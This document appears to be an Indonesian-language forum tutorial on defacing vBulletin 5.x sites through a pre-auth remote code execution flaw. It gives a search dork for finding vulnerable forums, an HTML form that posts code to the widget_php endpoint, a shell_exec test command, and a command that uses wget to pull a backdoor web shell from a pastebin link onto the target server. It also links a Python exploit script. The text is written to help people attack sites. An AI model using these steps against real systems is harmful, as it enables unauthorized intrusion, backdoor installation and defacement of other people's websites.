Deface VBulletin Version 5.x.x RCE


+++++++++++++++++++++++++++++++++++++++++++++++++++++++
Poc : vBulletin 5.x 0day pre-auth RCE
Source : https://packetstormsecurity.com/files/154623/vBulletin-5.x-0-Day-Pre-Auth-Remote-Command-Execution.html

Dork : inurl:/forum intext:"Powered by vBulletin"+"Version 5.4.3" (use your brain)

Exploit : http://target.co/[path]//ajax/render/widget_php
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

Pertama silahkan cari dulu targetnya pake dork yang udah ane kasih atau kembangin lagi ..
lalu masukan exploitnya untuk mengecek vuln . cek

http://target.co/[path]//ajax/render/widget_php
Maka akan tampil seperti dibawah ini


Masukkan targetnya kedalam script dibawah ini :

Script exploit.html:
<form method="POST" action="https://www.target.org/forum//ajax/render/widget_php" >

<input name="widgetConfig[code]" id="widgetConfig[code]" type="text" />

<input type="submit" />

</form>


edit pada bagian action ,, kemudian kita jalankan script csrfnya kemudian akan tampil seperti dibawah :


masukan command linux untuk memulai pengeksekusian kode bisa dengan menggunakan perintah:

echo shell_exec('id');
atau kamu coba masukan perintah perintah linux lainnya kemudian coba submit.
Maka akan seperti dibawah ini:


Perhatikan pada lingkaran merah,, itu menandakan  kode yang dipost tadi berhasil dieksekusi server. Selanjutnya kamu bisa memasukkan perintah perintah yang lain misalnya kamu mengupload shell backdoor dengan menggunakkan perintah:

echo shell_exec('wget -O shell.php https://pastebin.com/raw/4VcQuc55');

maka file shell kamu jika terupload letaknya berada dibelakang /ajax maka jika jadi target kamu https://www.target.org/forum/ajax/render/widget_php maka shell kamu berada di https://www.target.org/forum/shell.php

kemudian tinggak buka saja:

Kalo yang mau pake python bisa download scriptnya disini https://pastebin.com/raw/AWtx6B9k

Sekian tutorial dari kami terimakasih .